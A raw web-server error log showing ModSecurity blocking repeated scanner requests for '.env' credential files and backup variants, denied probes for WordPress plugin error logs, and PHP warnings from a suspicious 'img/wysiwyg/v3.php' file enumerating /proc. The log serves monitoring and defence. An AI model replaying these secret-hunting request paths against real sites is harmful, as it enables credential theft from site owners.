[Mon May 11 11:36:29.958808 2026] [security2:error] [pid 1254328:tid 1254343] [client 185.177.72.9:46266] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjHERdw2n9wv6Ai48DKAAAAIw"]
[Mon May 11 11:36:29.986564 2026] [security2:error] [pid 1254212:tid 1254233] [client 185.177.72.9:46282] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /svelte/.env.dist.release"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/svelte/.env.dist.release"] [unique_id "agGjHUYQeUtAPynIs6xTjAAAABM"]
[Mon May 11 11:36:29.987065 2026] [security2:error] [pid 1254212:tid 1254233] [client 185.177.72.9:46282] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/svelte/.env.dist.release"] [unique_id "agGjHUYQeUtAPynIs6xTjAAAABM"]
[Mon May 11 11:36:31.190961 2026] [security2:error] [pid 1254212:tid 1254233] [client 185.177.72.9:46282] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjHUYQeUtAPynIs6xTjAAAABM"]
[Mon May 11 11:36:32.910724 2026] [authz_core:error] [pid 1254242:tid 1254453] [client 88.88.156.124:40710] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/schedules/error_log
[Mon May 11 11:36:33.247112 2026] [security2:error] [pid 1254328:tid 1254336] [client 43.159.152.184:36108] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/"] [unique_id "agGjIURdw2n9wv6Ai48DKwAAAIU"]
[Mon May 11 11:36:33.674083 2026] [security2:error] [pid 1254212:tid 1254232] [client 185.177.72.9:33296] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /symfony/.env.development.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/symfony/.env.development.backup"] [unique_id "agGjIUYQeUtAPynIs6xTjgAAABI"]
[Mon May 11 11:36:33.674424 2026] [security2:error] [pid 1254212:tid 1254232] [client 185.177.72.9:33296] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/symfony/.env.development.backup"] [unique_id "agGjIUYQeUtAPynIs6xTjgAAABI"]
[Mon May 11 11:36:34.431182 2026] [authz_core:error] [pid 1254242:tid 1254453] [client 88.88.156.124:40710] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/schedules/error_log
[Mon May 11 11:36:35.112421 2026] [security2:error] [pid 1254212:tid 1254232] [client 185.177.72.9:33296] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjIUYQeUtAPynIs6xTjgAAABI"]
[Mon May 11 11:36:35.140620 2026] [security2:error] [pid 1256241:tid 1256268] [client 185.177.72.9:33306] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /symfony/.env.development.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/symfony/.env.development.backup"] [unique_id "agGjI5kIEwRJMyDaV55J0gAAAVY"]
[Mon May 11 11:36:35.140828 2026] [security2:error] [pid 1256241:tid 1256268] [client 185.177.72.9:33306] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/symfony/.env.development.backup"] [unique_id "agGjI5kIEwRJMyDaV55J0gAAAVY"]
[Mon May 11 11:36:35.808637 2026] [authz_core:error] [pid 1254242:tid 1254453] [client 88.88.156.124:40710] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/schedules/error_log
[Mon May 11 11:36:37.331235 2026] [authz_core:error] [pid 1254242:tid 1254453] [client 88.88.156.124:40710] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/schedules/error_log
[Mon May 11 11:36:37.717113 2026] [security2:error] [pid 1256241:tid 1256268] [client 185.177.72.9:33306] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjI5kIEwRJMyDaV55J0gAAAVY"]
[Mon May 11 11:36:37.719167 2026] [security2:error] [pid 1254328:tid 1254399] [client 43.159.152.184:53548] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/"] [unique_id "agGjJURdw2n9wv6Ai48DMAAAAI4"], referer: http://letamsgarage.fr
[Mon May 11 11:36:37.742631 2026] [security2:error] [pid 1254179:tid 1254183] [client 185.177.72.9:33320] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /symfony/.env.dist_production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/symfony/.env.dist_production"] [unique_id "agGjJWS6k_SCYd1AVZqp7gAAAQI"]
[Mon May 11 11:36:37.742966 2026] [security2:error] [pid 1254179:tid 1254183] [client 185.177.72.9:33320] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/symfony/.env.dist_production"] [unique_id "agGjJWS6k_SCYd1AVZqp7gAAAQI"]
[Mon May 11 11:36:38.931654 2026] [security2:error] [pid 1254179:tid 1254183] [client 185.177.72.9:33320] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjJWS6k_SCYd1AVZqp7gAAAQI"]
[Mon May 11 11:36:38.959775 2026] [security2:error] [pid 1256241:tid 1256269] [client 185.177.72.9:33328] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /symfony/.env.dist_production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/symfony/.env.dist_production"] [unique_id "agGjJpkIEwRJMyDaV55J1QAAAVc"]
[Mon May 11 11:36:38.959999 2026] [security2:error] [pid 1256241:tid 1256269] [client 185.177.72.9:33328] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/symfony/.env.dist_production"] [unique_id "agGjJpkIEwRJMyDaV55J1QAAAVc"]
[Mon May 11 11:36:40.422542 2026] [security2:error] [pid 1256241:tid 1256269] [client 185.177.72.9:33328] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjJpkIEwRJMyDaV55J1QAAAVc"]
[Mon May 11 11:36:40.449063 2026] [security2:error] [pid 1254242:tid 1254255] [client 185.177.72.9:33340] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /symfony/.env.example.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/symfony/.env.example.old"] [unique_id "agGjKL4KNmD_mZ_vlf8zzAAAAEo"]
[Mon May 11 11:36:40.449488 2026] [security2:error] [pid 1254242:tid 1254255] [client 185.177.72.9:33340] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/symfony/.env.example.old"] [unique_id "agGjKL4KNmD_mZ_vlf8zzAAAAEo"]
[Mon May 11 11:36:41.878562 2026] [security2:error] [pid 1254242:tid 1254255] [client 185.177.72.9:33340] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjKL4KNmD_mZ_vlf8zzAAAAEo"]
[Mon May 11 11:36:41.905039 2026] [security2:error] [pid 1254242:tid 1254258] [client 185.177.72.9:33348] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /symfony/.env.example.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/symfony/.env.example.old"] [unique_id "agGjKb4KNmD_mZ_vlf8zzgAAAE0"]
[Mon May 11 11:36:41.905357 2026] [security2:error] [pid 1254242:tid 1254258] [client 185.177.72.9:33348] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/symfony/.env.example.old"] [unique_id "agGjKb4KNmD_mZ_vlf8zzgAAAE0"]
[Mon May 11 11:36:43.092396 2026] [authz_core:error] [pid 1254212:tid 1254230] [client 88.88.156.124:56818] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/lib/cron-expression/error_log
[Mon May 11 11:36:43.374693 2026] [security2:error] [pid 1254242:tid 1254258] [client 185.177.72.9:33348] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjKb4KNmD_mZ_vlf8zzgAAAE0"]
[Mon May 11 11:36:44.664723 2026] [authz_core:error] [pid 1254212:tid 1254230] [client 88.88.156.124:56818] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/lib/cron-expression/error_log
[Mon May 11 11:36:46.037638 2026] [authz_core:error] [pid 1254212:tid 1254230] [client 88.88.156.124:56818] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/lib/cron-expression/error_log
[Mon May 11 11:36:47.549964 2026] [authz_core:error] [pid 1254212:tid 1254230] [client 88.88.156.124:56818] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/lib/cron-expression/error_log
[Mon May 11 11:36:49.100752 2026] [authz_core:error] [pid 1254212:tid 1254230] [client 88.88.156.124:56818] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor_prefixed/google/apiclient-services/src/Gmail/Resource/error_log
[Mon May 11 11:36:50.606429 2026] [authz_core:error] [pid 1254212:tid 1254230] [client 88.88.156.124:56818] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor_prefixed/google/auth/src/Cache/error_log
[Mon May 11 11:36:50.771789 2026] [security2:error] [pid 1254133:tid 1254149] [client 185.177.72.9:35190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /temp/.env.test5"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/temp/.env.test5"] [unique_id "agGjMhjZymfuKpjWXeh4LgAAAM0"]
[Mon May 11 11:36:50.771997 2026] [security2:error] [pid 1254133:tid 1254149] [client 185.177.72.9:35190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/temp/.env.test5"] [unique_id "agGjMhjZymfuKpjWXeh4LgAAAM0"]
[Mon May 11 11:36:51.935341 2026] [security2:error] [pid 1254133:tid 1254149] [client 185.177.72.9:35190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjMhjZymfuKpjWXeh4LgAAAM0"]
[Mon May 11 11:36:51.962088 2026] [security2:error] [pid 1254242:tid 1254249] [client 185.177.72.9:35200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /temp/.env.test5"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/temp/.env.test5"] [unique_id "agGjM74KNmD_mZ_vlf8z3QAAAEM"]
[Mon May 11 11:36:51.962622 2026] [security2:error] [pid 1254242:tid 1254249] [client 185.177.72.9:35200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/temp/.env.test5"] [unique_id "agGjM74KNmD_mZ_vlf8z3QAAAEM"]
[Mon May 11 11:36:52.144162 2026] [authz_core:error] [pid 1254212:tid 1254230] [client 88.88.156.124:56818] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor_prefixed/guzzlehttp/guzzle/src/Exception/error_log
[Mon May 11 11:36:53.174261 2026] [security2:error] [pid 1254242:tid 1254249] [client 185.177.72.9:35200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjM74KNmD_mZ_vlf8z3QAAAEM"]
PHP Warning:  filesize(): stat failed for /proc/213/task/213/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/213/task/213/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/213/task/213/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/213/task/213/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/213/task/213/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/213/task/213/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 11:37:05.403810 2026] [security2:error] [pid 1254242:tid 1254258] [client 185.177.72.9:33880] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /templates/.env.debug_new"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/templates/.env.debug_new"] [unique_id "agGjQb4KNmD_mZ_vlf8z5QAAAE0"]
[Mon May 11 11:37:05.404027 2026] [security2:error] [pid 1254242:tid 1254258] [client 185.177.72.9:33880] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/templates/.env.debug_new"] [unique_id "agGjQb4KNmD_mZ_vlf8z5QAAAE0"]
[Mon May 11 11:37:06.608583 2026] [security2:error] [pid 1254242:tid 1254258] [client 185.177.72.9:33880] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjQb4KNmD_mZ_vlf8z5QAAAE0"]
[Mon May 11 11:37:06.635484 2026] [security2:error] [pid 1254242:tid 1254253] [client 185.177.72.9:33896] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /templates/.env.debug_new"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/templates/.env.debug_new"] [unique_id "agGjQr4KNmD_mZ_vlf8z5wAAAEg"]
